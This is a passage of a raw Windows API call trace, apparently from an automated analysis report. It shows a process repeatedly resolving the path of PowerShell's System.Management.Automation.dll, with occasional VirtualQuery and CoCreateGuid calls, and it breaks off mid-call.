lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.596] VirtualQuery (in: lpAddress=0xcb300, lpBuffer=0xcc1c0, dwLength=0x30 | out: lpBuffer=0xcc1c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.596] VirtualQuery (in: lpAddress=0xcb390, lpBuffer=0xcc250, dwLength=0x30 | out: lpBuffer=0xcc250*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.625] VirtualQuery (in: lpAddress=0xcb5b0, lpBuffer=0xcc470, dwLength=0x30 | out: lpBuffer=0xcc470*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.627] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1352ac50, Data2=0xf812, Data3=0x410b, Data4=([0]=0x8f, [1]=0xb4, [2]=0xf3, [3]=0xd5, [4]=0xe2, [5]=0x7b, [6]=0xe, [7]=0x37))) returned 0x0 [0135.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.631] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x3c3f4f8d, Data2=0xc9c0, Data3=0x49af, Data4=([0]=0xaa, [1]=0xf9, [2]=0x20, [3]=0xfb, [4]=0x84, [5]=0xa9, [6]=0x8e, [7]=0xd9))) returned 0x0 [0135.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.633] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x139a6372, Data2=0x1b45, Data3=0x466b, Data4=([0]=0x9f, [1]=0x73, [2]=0xac, [3]=0x77, [4]=0x94, [5]=0xb7, [6]=0x1, [7]=0x82))) returned 0x0 [0135.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.635] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xa0d07fb7, Data2=0x4766, Data3=0x49e8, Data4=([0]=0x9d, [1]=0x62, [2]=0x40, [3]=0xaf, [4]=0xf0, [5]=0xd1, [6]=0x5b, [7]=0x2e))) returned 0x0 [0135.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.637] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x81d7f61e, Data2=0x4fb2, Data3=0x4f8e, Data4=([0]=0xbb, [1]=0xce, [2]=0xf5, [3]=0x67, [4]=0x24, [5]=0xec, [6]=0x8b, [7]=0x9d))) returned 0x0 [0135.638] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x63615c13, Data2=0x564c, Data3=0x4033, Data4=([0]=0xa6, [1]=0xc5, [2]=0xd5, [3]=0x9f, [4]=0x64, [5]=0x66, [6]=0xd, [7]=0xf3))) returned 0x0 [0135.638] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1b3e5715, Data2=0x956f, Data3=0x4eea, Data4=([0]=0x88, [1]=0xb7, [2]=0xa6, [3]=0x76, [4]=0x2f, [5]=0x89, [6]=0xf5, [7]=0x2e))) returned 0x0 [0135.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: 